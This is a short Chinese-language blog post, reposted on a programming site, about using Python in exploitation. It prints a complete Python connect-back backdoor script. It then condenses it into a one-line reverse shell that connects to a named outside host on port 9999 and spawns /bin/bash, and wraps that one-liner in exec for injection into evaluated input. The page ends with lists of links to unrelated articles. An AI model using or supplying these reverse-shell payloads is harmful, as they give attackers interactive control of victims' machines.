首页
所有分类
TAGS
文字工具 EMOJI BIBLE
编程 Python

在漏洞利用Python代码真的很爽

Posted in Python onAugust 26, 2007

不知道怎么忽然想看这个,呵呵
小我的python的反shell的代码
#!/usr/bin/python
# Python Connect-back Backdoor
# Author: wofeiwo <wofeiwo[0x40]gmail[0x2e]com>
# Version: 1.0
# Date: July 15th 2006

import sys
import os
import socket
shell = "/bin/sh"

def usage(programname):
  print "Python Connect-back Backdoor"
  print "Auther: wofeiwo <wofeiwo[0x40]gmail[0x2e]com>"
  print "Date: July 15th 2006\n"
  print "Usage: %s <conn_back_host> <port>\n" % programname

def main():
  if len(sys.argv) != 3: 
    usage(sys.argv[0])
    sys.exit(1)

  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  try: 
    s.connect((socket.gethostbyname(sys.argv[1]),int(sys.argv[2])))
    print "[+] Connect ok." 
  except: 
    print "[-] Could not connect to %s:%s" % (sys.argv[1], sys.argv[2]) 
    sys.exit(2)
  s.send("-------------------- Python Connect-back Backdoor --------------------\n")
  s.send("----------------------------- By wofeiwo -----------------------------\n")
  os.dup2(s.fileno(), 0)
  os.dup2(s.fileno(), 1)
  os.dup2(s.fileno(), 2)
  global shell
  os.system(shell)
  print "See U!"
  s.close()

if __name__ == "__main__": main()

用在漏洞利用的时候不太好,不是么?我们想要短点的,节省下就是

import sys;import os;import socket;s = socket.socket(socket.AF_INET, socket.SOCK_STREAM);s.connect((socket.gethostbyname("www.loveshell.net"),9999));s.send("Welcome my master\r\n");os.dup2(s.fileno(), 0);os.dup2(s.fileno(), 1);os.dup2(s.fileno(), 2);s.send("Is there a shell?\r\n");os.system("/bin/bash");s.close();s.send("See u next time!\r\n");

如何?很短了吧?
不过很可能漏洞利用的地方不允许多语句,譬如允许的输入是在eval当中,不能多语句(后面有解释)那么还可以变化下
exec 'import sys;import os;import socket;s = socket.socket(socket.AF_INET, socket.SOCK_STREAM);s.connect((socket.gethostbyname("www.loveshell.net"),9999));s.send("Welcome my master\\r\\n");os.dup2(s.fileno(), 0);os.dup2(s.fileno(), 1);os.dup2(s.fileno(), 2);s.send("Is there a shell?\\r\\n");os.system("/bin/bash");s.close();s.send("See u next time!\\r\\n");';

注意是\\r\\n哦,即使在''里好象\r\n一样会成为换行,所以其实这里即使不用;一样可以构造好代码的,另外,为什么不用eval呢?
翻了下手册
exec语句用来执行储存在字符串或文件中的Python语句。例如,我们可以在运行时生成一个包含Python代码的字符串,然后使用exec语句执行这些语句

eval语句用来计算存储在字符串中的有效Python表达式

呵呵,这里用eval好象会出错.
YY一下,思想是相同的,但是具体到语言又是不一样的,如何跳出语言的限制呢?是个问题......

在漏洞利用Python代码真的很爽

声明:登载此文出于传递更多信息之目的,并不意味着赞同其观点或证实其描述。

Python 相关文章推荐
python sort、sorted高级排序技巧
Nov 21 Python
pygame学习笔记(3):运动速率、时间、事件、文字
Apr 15 Python
python re模块findall()函数实例解析
Jan 19 Python
新手常见6种的python报错及解决方法
Mar 09 Python
Python实现的根据IP地址计算子网掩码位数功能示例
May 23 Python
Python检查ping终端的方法
Jan 26 Python
浅析matlab中imadjust函数
Feb 27 Python
Python GUI编程学习笔记之tkinter界面布局显示详解
Mar 30 Python
Django models文件模型变更错误解决
May 11 Python
pytorch实现查看当前学习率
Jun 24 Python
python获取淘宝服务器时间的代码示例
Apr 22 Python
PyQt5结合QtDesigner实现文本框读写操作
Jun 11 Python
python编程-将Python程序转化为可执行程序[整理]
Apr 09 #Python
python的几种开发工具介绍
Mar 07 #Python
王纯业的Python学习笔记 下载
Feb 10 #Python
一篇不错的Python入门教程
Feb 08 #Python
Python学习资料
Feb 08 #Python
Python完全新手教程
Feb 08 #Python
简明 Python 基础学习教程
Feb 08 #Python
destoon(1) create(1)  AD域(1) mounted(1) Rewrite(4) 子查询(1) nginx(76) Windows server 2012(17) 组策略(1) 日志格式分析(1)
You might like
php的一个登录的类 [推荐]
2007/03/16 PHP
PHP 图片水印类代码
2012/08/27 PHP
php过滤表单提交的html等危险代码
2014/11/03 PHP
php实现每天自动变换随机问候语的方法
2015/05/12 PHP
php图片上传类 附调用方法
2016/05/15 PHP
CSS JavaScript 实现菜单功能 改进版
2008/12/09 Javascript
csdn 批量接受好友邀请
2009/02/19 Javascript
原生javascript实现获取指定元素下所有后代元素的方法
2014/10/28 Javascript
jquery显示隐藏元素的实现代码
2016/05/19 Javascript
Vue-cli创建项目从单页面到多页面的方法
2017/09/20 Javascript
vue-cli3.0 环境变量与模式配置方法
2018/11/08 Javascript
vue中监听返回键问题
2019/08/28 Javascript
vue 实现用户登录方式的切换功能
2020/04/14 Javascript
jQuery实现开关灯效果
2020/08/02 jQuery
[01:15:44]首部DOTA2纪录片今日23时全网上映
2014/03/19 DOTA
[02:47]2018年度DOTA2最佳辅助位选手4号位-完美盛典
2018/12/17 DOTA
Python和Ruby中each循环引用变量问题(一个隐秘BUG?)
2014/06/04 Python
python实现在pickling的时候压缩的方法
2014/09/25 Python
Python3通过Luhn算法快速验证信用卡卡号的方法
2015/05/14 Python
Python OOP类中的几种函数或方法总结
2019/02/22 Python
利用python脚本如何简化jar操作命令
2019/02/24 Python
了解不常见但是实用的Python技巧
2019/05/23 Python
华为校园招聘上机笔试题 扑克牌大小(python)
2020/04/22 Python
Python+OpenCV+pyQt5录制双目摄像头视频的实例
2019/06/28 Python
Python 离线工作环境搭建的方法步骤
2019/07/29 Python
详解django实现自定义manage命令的扩展
2019/08/13 Python
Python数据持久化存储实现方法分析
2019/12/21 Python
python 爬虫网页登陆的简单实现
2020/11/30 Python
html5简介及新增功能介绍
2020/05/18 HTML / CSS
SCHIESSER荷兰官方网站:德国内衣专家
2020/10/09 全球购物
简历中自我评价分享
2013/10/09 职场文书
感恩父母的演讲稿
2014/05/06 职场文书
纪检监察建议书
2014/05/19 职场文书
授权委托书
2015/01/28 职场文书
2016简单的租房合同范本
2016/03/18 职场文书
Go语言空白表示符_的实例用法
2021/07/04 Golang